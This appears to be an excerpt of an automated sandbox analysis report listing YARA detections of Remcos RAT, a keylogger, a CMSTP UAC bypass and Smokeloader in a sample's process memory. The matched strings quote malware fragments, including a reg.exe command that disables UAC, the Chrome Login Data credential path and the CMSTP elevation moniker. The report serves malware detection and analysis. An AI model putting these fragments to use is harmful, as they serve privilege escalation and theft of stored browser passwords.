00000017.00000002.2514858841.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000018.00000003.1454164978.0000000002590000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000018.00000003.1454164978.0000000002590000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000018.00000003.1454164978.0000000002590000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000018.00000003.1454164978.0000000002590000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6aaf8:$a1: Remcos restarted by watchdog! 0x6b070:$a3: %02i:%02i:%02i:%03i
00000018.00000003.1454164978.0000000002590000.00000004.00001000.00020000.00000000.sdmp	REMCOS_RAT_variants	unknown	unknown	0x64d94:$str_a1: C:\Windows\System32\cmd.exe 0x64d10:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64d10:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x65210:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x65810:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x64e04:$str_b2: Executing file: 0x65c3c:$str_b3: GetDirectListeningPort 0x65600:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x65780:$str_b7: \update.vbs 0x64e2c:$str_b9: Downloaded file: 0x64e18:$str_b10: Downloading file: 0x64ebc:$str_b12: Failed to upload file: 0x65c04:$str_b13: StartForward 0x65c24:$str_b14: StopForward 0x656d8:$str_b15: fso.DeleteFile " 0x6566c:$str_b16: On Error Resume Next 0x65708:$str_b17: fso.DeleteFolder " 0x64eac:$str_b18: Uploaded file: 0x64e6c:$str_b19: Unable to delete: 0x656a0:$str_b20: while fso.FileExists(" 0x65349:$str_c0: [Firefox StoredLogins not found]
00000018.00000003.1454164978.0000000002590000.00000004.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x64c80:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x64c10:$s1: CoGetObject 0x64c24:$s1: CoGetObject 0x64c40:$s1: CoGetObject 0x6e870:$s1: CoGetObject 0x64bd0:$s2: Elevation:Administrator!new:
00000023.00000002.1790357111.00000000024E0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000023.00000002.1790357111.00000000024E0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000023.00000002.1790357111.00000000024E0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000023.00000002.1790357111.00000000024E0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6b95f:$a1: Remcos restarted by watchdog! 0x6bed7:$a3: %02i:%02i:%02i:%03i
00000023.00000002.1790357111.00000000024E0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
Process Memory Space: 2iH7rqx9rQ.exe PID: 2268	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: 2iH7rqx9rQ.exe PID: 2268	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: 2iH7rqx9rQ.exe PID: 2268	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: 2iH7rqx9rQ.exe PID: 2268	Windows_Trojan_Remcos_b296e965	unknown	unknown	0xa305:$a1: Remcos restarted by watchdog! 0x27795:$a1: Remcos restarted by watchdog! 0x376f5:$a1: Remcos restarted by watchdog! 0xa862:$a3: %02i:%02i:%02i:%03i 0xac1a:$a3: %02i:%02i:%02i:%03i 0x27cf2:$a3: %02i:%02i:%02i:%03i 0x280aa:$a3: %02i:%02i:%02i:%03i 0x37c52:$a3: %02i:%02i:%02i:%03i 0x3800a:$a3: %02i:%02i:%02i:%03i
Process Memory Space: yavascript.exe PID: 7796	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: yavascript.exe PID: 7796	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: yavascript.exe PID: 7796	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: yavascript.exe PID: 7796	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x10fee:$a1: Remcos restarted by watchdog! 0x21caa:$a1: Remcos restarted by watchdog! 0x322d7:$a1: Remcos restarted by watchdog! 0x1154b:$a3: %02i:%02i:%02i:%03i 0x11903:$a3: %02i:%02i:%02i:%03i 0x22207:$a3: %02i:%02i:%02i:%03i 0x225bf:$a3: %02i:%02i:%02i:%03i 0x32834:$a3: %02i:%02i:%02i:%03i 0x32bec:$a3: %02i:%02i:%02i:%03i
Process Memory Space: yavascript.exe PID: 7828	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: yavascript.exe PID: 7828	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: yavascript.exe PID: 7828	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: yavascript.exe PID: 7828	Windows_Trojan_Remcos_b296e965	unknown	unknown	0xb5ba:$a1: Remcos restarted by watchdog! 0x2080a:$a1: Remcos restarted by watchdog! 0x33f97:$a1: Remcos restarted by watchdog! 0xbb17:$a3: %02i:%02i:%02i:%03i 0xbecf:$a3: %02i:%02i:%02i:%03i 0x20d67:$a3: %02i:%02i:%02i:%03i 0x2111f:$a3: %02i:%02i:%02i:%03i 0x344f4:$a3: %02i:%02i:%02i:%03i 0x348ac:$a3: %02i:%02i:%02i:%03i
Process Memory Space: yavascript.exe PID: 2980	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: yavascript.exe PID: 2980	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: yavascript.exe PID: 2980	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: yavascript.exe PID: 2980	Windows_Trojan_Remcos_b296e965	unknown	unknown	0xb563:$a1: Remcos restarted by watchdog! 0x1831d:$a1: Remcos restarted by watchdog! 0x30cfb:$a1: Remcos restarted by watchdog! 0xbac0:$a3: %02i:%02i:%02i:%03i 0xbe78:$a3: %02i:%02i:%02i:%03i 0x1887a:$a3: %02i:%02i:%02i:%03i 0x18c32:$a3: %02i:%02i:%02i:%03i 0x31258:$a3: %02i:%02i:%02i:%03i 0x31610:$a3: %02i:%02i:%02i:%03i
Click to see the 87 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
23.2.yavascript.exe.ae0e67.1.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
23.2.yavascript.exe.ae0e67.1.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
23.2.yavascript.exe.ae0e67.1.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
23.2.yavascript.exe.ae0e67.1.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6aaf8:$a1: Remcos restarted by watchdog! 0x6b070:$a3: %02i:%02i:%02i:%03i
23.2.yavascript.exe.ae0e67.1.unpack	REMCOS_RAT_variants	unknown	unknown	0x64d94:$str_a1: C:\Windows\System32\cmd.exe 0x64d10:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64d10:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x65210:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x65810:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x64e04:$str_b2: Executing file: 0x65c3c:$str_b3: GetDirectListeningPort 0x65600:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x65780:$str_b7: \update.vbs 0x64e2c:$str_b9: Downloaded file: 0x64e18:$str_b10: Downloading file: 0x64ebc:$str_b12: Failed to upload file: 0x65c04:$str_b13: StartForward 0x65c24:$str_b14: StopForward 0x656d8:$str_b15: fso.DeleteFile " 0x6566c:$str_b16: On Error Resume Next 0x65708:$str_b17: fso.DeleteFolder " 0x64eac:$str_b18: Uploaded file: 0x64e6c:$str_b19: Unable to delete: 0x656a0:$str_b20: while fso.FileExists(" 0x65349:$str_c0: [Firefox StoredLogins not found]
23.2.yavascript.exe.ae0e67.1.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x64c80:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x64c10:$s1: CoGetObject 0x64c24:$s1: CoGetObject 0x64c40:$s1: CoGetObject 0x6e870:$s1: CoGetObject 0x64bd0:$s2: Elevation:Administrator!new:
35.2.yavascript.exe.24e0e67.1.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
35.2.yavascript.exe.24e0e67.1.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
35.2.yavascript.exe.24e0e67.1.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
35.2.yavascript.exe.24e0e67.1.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6aaf8:$a1: Remcos restarted by watchdog! 0x6b070:$a3: %02i:%02i:%02i:%03i
35.2.yavascript.exe.24e0e67.1.unpack	REMCOS_RAT_variants	unknown	unknown	0x64d94:$str_a1: C:\Windows\System32\cmd.exe 0x64d10:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64d10:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x65210:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x65810:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x64e04:$str_b2: Executing file: 0x65c3c:$str_b3: GetDirectListeningPort 0x65600:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x65780:$str_b7: \update.vbs 0x64e2c:$str_b9: Downloaded file: 0x64e18:$str_b10: Downloading file: 0x64ebc:$str_b12: Failed to upload file: 0x65c04:$str_b13: StartForward 0x65c24:$str_b14: StopForward 0x656d8:$str_b15: fso.DeleteFile " 0x6566c:$str_b16: On Error Resume Next 0x65708:$str_b17: fso.DeleteFolder " 0x64eac:$str_b18: Uploaded file: 0x64e6c:$str_b19: Unable to delete: 0x656a0:$str_b20: while fso.FileExists(" 0x65349:$str_c0: [Firefox StoredLogins not found]
35.2.yavascript.exe.24e0e67.1.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x64c80:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x64c10:$s1: CoGetObject 0x64c24:$s1: CoGetObject 0x64c40:$s1: CoGetObject 0x6e870:$s1: CoGetObject 0x64bd0:$s2: Elevation:Administrator!new:
23.2.yavascript.exe.400000.0.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
23.2.yavascript.exe.400000.0.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
23.2.yavascript.exe.400000.0.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
23.2.yavascript.exe.400000.0.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6b6f8:$a1: Remcos restarted by watchdog! 0x6bc70:$a3: %02i:%02i:%02i:%03i
23.2.yavascript.exe.400000.0.unpack	REMCOS_RAT_variants	unknown	unknown	0x65994:$str_a1: C:\Windows\System32\cmd.exe 0x65910:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x65910:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x65e10:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x66410:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x65a04:$str_b2: Executing file: 0x6683c:$str_b3: GetDirectListeningPort 0x66200:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x66380:$str_b7: \update.vbs 0x65a2c:$str_b9: Downloaded file: 0x65a18:$str_b10: Downloading file: 0x65abc:$str_b12: Failed to upload file: 0x66804:$str_b13: StartForward 0x66824:$str_b14: StopForward 0x662d8:$str_b15: fso.DeleteFile " 0x6626c:$str_b16: On Error Resume Next 0x66308:$str_b17: fso.DeleteFolder " 0x65aac:$str_b18: Uploaded file: 0x65a6c:$str_b19: Unable to delete: 0x662a0:$str_b20: while fso.FileExists(" 0x65f49:$str_c0: [Firefox StoredLogins not found]
23.2.yavascript.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x65880:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x65810:$s1: CoGetObject 0x65824:$s1: CoGetObject 0x65840:$s1: CoGetObject 0x6f470:$s1: CoGetObject 0x657d0:$s2: Elevation:Administrator!new:
0.2.2iH7rqx9rQ.exe.400000.0.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
0.2.2iH7rqx9rQ.exe.400000.0.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0.2.2iH7rqx9rQ.exe.400000.0.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
0.2.2iH7rqx9rQ.exe.400000.0.raw.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6b6f8:$a1: Remcos restarted by watchdog! 0x6bc70:$a3: %02i:%02i:%02i:%03i
0.2.2iH7rqx9rQ.exe.400000.0.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x65994:$str_a1: C:\Windows\System32\cmd.exe 0x65910:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x65910:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x65e10:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x66410:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x65a04:$str_b2: Executing file: 0x6683c:$str_b3: GetDirectListeningPort 0x66200:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x66380:$str_b7: \update.vbs 0x65a2c:$str_b9: Downloaded file: 0x65a18:$str_b10: Downloading file: 0x65abc:$str_b12: Failed to upload file: 0x66804:$str_b13: StartForward 0x66824:$str_b14: StopForward 0x662d8:$str_b15: fso.DeleteFile " 0x6626c:$str_b16: On Error Resume Next 0x66308:$str_b17: fso.DeleteFolder " 0x65aac:$str_b18: Uploaded file: 0x65a6c:$str_b19: Unable to delete: 0x662a0:$str_b20: while fso.FileExists(" 0x65f49:$str_c0: [Firefox StoredLogins not found]
0.2.2iH7rqx9rQ.exe.400000.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x65880:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x65810:$s1: CoGetObject 0x65824:$s1: CoGetObject 0x65840:$s1: CoGetObject 0x6f470:$s1: CoGetObject 0x657d0:$s2: Elevation:Administrator!new:
35.2.yavascript.exe.24e0e67.1.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
35.2.yavascript.exe.24e0e67.1.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
35.2.yavascript.exe.24e0e67.1.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
35.2.yavascript.exe.24e0e67.1.raw.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6aaf8:$a1: Remcos restarted by watchdog! 0x6b070:$a3: %02i:%02i:%02i:%03i
35.2.yavascript.exe.24e0e67.1.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x64d94:$str_a1: C:\Windows\System32\cmd.exe 0x64d10:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64d10:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x65210:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x65810:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x64e04:$str_b2: Executing file: 0x65c3c:$str_b3: GetDirectListeningPort 0x65600:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x65780:$str_b7: \update.vbs 0x64e2c:$str_b9: Downloaded file: 0x64e18:$str_b10: Downloading file: 0x64ebc:$str_b12: Failed to upload file: 0x65c04:$str_b13: StartForward 0x65c24:$str_b14: StopForward 0x656d8:$str_b15: fso.DeleteFile " 0x6566c:$str_b16: On Error Resume Next 0x65708:$str_b17: fso.DeleteFolder " 0x64eac:$str_b18: Uploaded file: 0x64e6c:$str_b19: Unable to delete: 0x656a0:$str_b20: while fso.FileExists(" 0x65349:$str_c0: [Firefox StoredLogins not found]
35.2.yavascript.exe.24e0e67.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x64c80:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x64c10:$s1: CoGetObject 0x64c24:$s1: CoGetObject 0x64c40:$s1: CoGetObject 0x6e870:$s1: CoGetObject 0x64bd0:$s2: Elevation:Administrator!new:
24.3.yavascript.exe.2590000.0.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
24.3.yavascript.exe.2590000.0.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
24.3.yavascript.exe.2590000.0.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
24.3.yavascript.exe.2590000.0.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6aaf8:$a1: Remcos restarted by watchdog! 0x6b070:$a3: %02i:%02i:%02i:%03i
24.3.yavascript.exe.2590000.0.unpack	REMCOS_RAT_variants	unknown	unknown	0x64d94:$str_a1: C:\Windows\System32\cmd.exe 0x64d10:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64d10:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x65210:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x65810:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x64e04:$str_b2: Executing file: 0x65c3c:$str_b3: GetDirectListeningPort 0x65600:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x65780:$str_b7: \update.vbs 0x64e2c:$str_b9: Downloaded file: 0x64e18:$str_b10: Downloading file: 0x64ebc:$str_b12: Failed to upload file: 0x65c04:$str_b13: StartForward 0x65c24:$str_b14: StopForward 0x656d8:$str_b15: fso.DeleteFile " 0x6566c:$str_b16: On Error Resume Next 0x65708:$str_b17: fso.DeleteFolder " 0x64eac:$str_b18: Uploaded file: 0x64e6c:$str_b19: Unable to delete: 0x656a0:$str_b20: while fso.FileExists(" 0x65349:$str_c0: [Firefox StoredLogins not found]
24.3.yavascript.exe.2590000.0.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x64c80:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x64c10:$s1: CoGetObject 0x64c24:$s1: CoGetObject 0x64c40:$s1: CoGetObject 0x6e870:$s1: CoGetObject 0x64bd0:$s2: Elevation:Administrator!new:
24.2.yavascript.exe.2510e67.1.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
24.2.yavascript.exe.2510e67.1.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
24.2.yavascript.exe.2510e67.1.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
24.2.yavascript.exe.2510e67.1.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6aaf8:$a1: Remcos restarted by watchdog! 0x6b070:$a3: %02i:%02i:%02i:%03i
24.2.yavascript.exe.2510e67.1.unpack	REMCOS_RAT_variants	unknown	unknown	0x64d94:$str_a1: C:\Windows\System32\cmd.exe 0x64d10:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64d10:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x65210:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x65810:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x64e04:$str_b2: Executing file: 0x65c3c:$str_b3: GetDirectListeningPort 0x65600:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x65780:$str_b7: \update.vbs 0x64e2c:$str_b9: Downloaded file: 0x64e18:$str_b10: Downloading file: 0x64ebc:$str_b12: Failed to upload file: 0x65c04:$str_b13: StartForward 0x65c24:$str_b14: StopForward 0x656d8:$str_b15: fso.DeleteFile " 0x6566c:$str_b16: On Error Resume Next 0x65708:$str_b17: fso.DeleteFolder " 0x64eac:$str_b18: Uploaded file: 0x64e6c:$str_b19: Unable to delete: 0x656a0:$str_b20: while fso.FileExists(" 0x65349:$str_c0: [Firefox StoredLogins not found]
24.2.yavascript.exe.2510e67.1.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x64c80:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x64c10:$s1: CoGetObject 0x64c24:$s1: CoGetObject 0x64c40:$s1: CoGetObject 0x6e870:$s1: CoGetObject 0x64bd0:$s2: Elevation:Administrator!new:
0.2.2iH7rqx9rQ.exe.2470e67.1.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
0.2.2iH7rqx9rQ.exe.2470e67.1.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0.2.2iH7rqx9rQ.exe.2470e67.1.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
0.2.2iH7rqx9rQ.exe.2470e67.1.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6aaf8:$a1: Remcos restarted by watchdog! 0x6b070:$a3: %02i:%02i:%02i:%03i
0.2.2iH7rqx9rQ.exe.2470e67.1.unpack	REMCOS_RAT_variants	unknown	unknown	0x64d94:$str_a1: C:\Windows\System32\cmd.exe 0x64d10:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64d10:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x65210:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x65810:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x64e04:$str_b2: Executing file: 0x65c3c:$str_b3: GetDirectListeningPort 0x65600:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x65780:$str_b7: \update.vbs 0x64e2c:$str_b9: Downloaded file: 0x64e18:$str_b10: Downloading file: 0x64ebc:$str_b12: Failed to upload file: 0x65c04:$str_b13: StartForward 0x65c24:$str_b14: StopForward 0x656d8:$str_b15: fso.DeleteFile " 0x6566c:$str_b16: On Error Resume Next 0x65708:$str_b17: fso.DeleteFolder " 0x64eac:$str_b18: Uploaded file: 0x64e6c:$str_b19: Unable to delete: 0x656a0:$str_b20: while fso.FileExists(" 0x65349:$str_c0: [Firefox StoredLogins not found]
0.2.2iH7rqx9rQ.exe.2470e67.1.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x64c80:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x64c10:$s1: CoGetObject 0x64c24:$s1: CoGetObject 0x64c40:$s1: CoGetObject 0x6e870:$s1: CoGetObject 0x64bd0:$s2: Elevation:Administrator!new:
35.2.yavascript.exe.400000.0.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
35.2.yavascript.exe.400000.0.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
35.2.yavascript.exe.400000.0.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
35.2.yavascript.exe.400000.0.raw.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6b6f8:$a1: Remcos restarted by watchdog! 0x6bc70:$a3: %02i:%02i:%02i:%03i
35.2.yavascript.exe.400000.0.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x65994:$str_a1: C:\Windows\System32\cmd.exe 0x65910:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x65910:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x65e10:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x66410:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x65a04:$str_b2: Executing file: 0x6683c:$str_b3: GetDirectListeningPort 0x66200:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x66380:$str_b7: \update.vbs 0x65a2c:$str_b9: Downloaded file: 0x65a18:$str_b10: Downloading file: 0x65abc:$str_b12: Failed to upload file: 0x66804:$str_b13: StartForward 0x66824:$str_b14: StopForward 0x662d8:$str_b15: fso.DeleteFile " 0x6626c:$str_b16: On Error Resume Next 0x66308:$str_b17: fso.DeleteFolder " 0x65aac:$str_b18: Uploaded file: 0x65a6c:$str_b19: Unable to delete: 0x662a0:$str_b20: while fso.FileExists(" 0x65f49:$str_c0: [Firefox StoredLogins not found]
35.2.yavascript.exe.400000.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x65880:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x65810:$s1: CoGetObject 0x65824:$s1: CoGetObject 0x65840:$s1: CoGetObject 0x6f470:$s1: CoGetObject 0x657d0:$s2: Elevation:Administrator!new:
24.2.yavascript.exe.400000.0.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
24.2.yavascript.exe.400000.0.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
24.2.yavascript.exe.400000.0.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
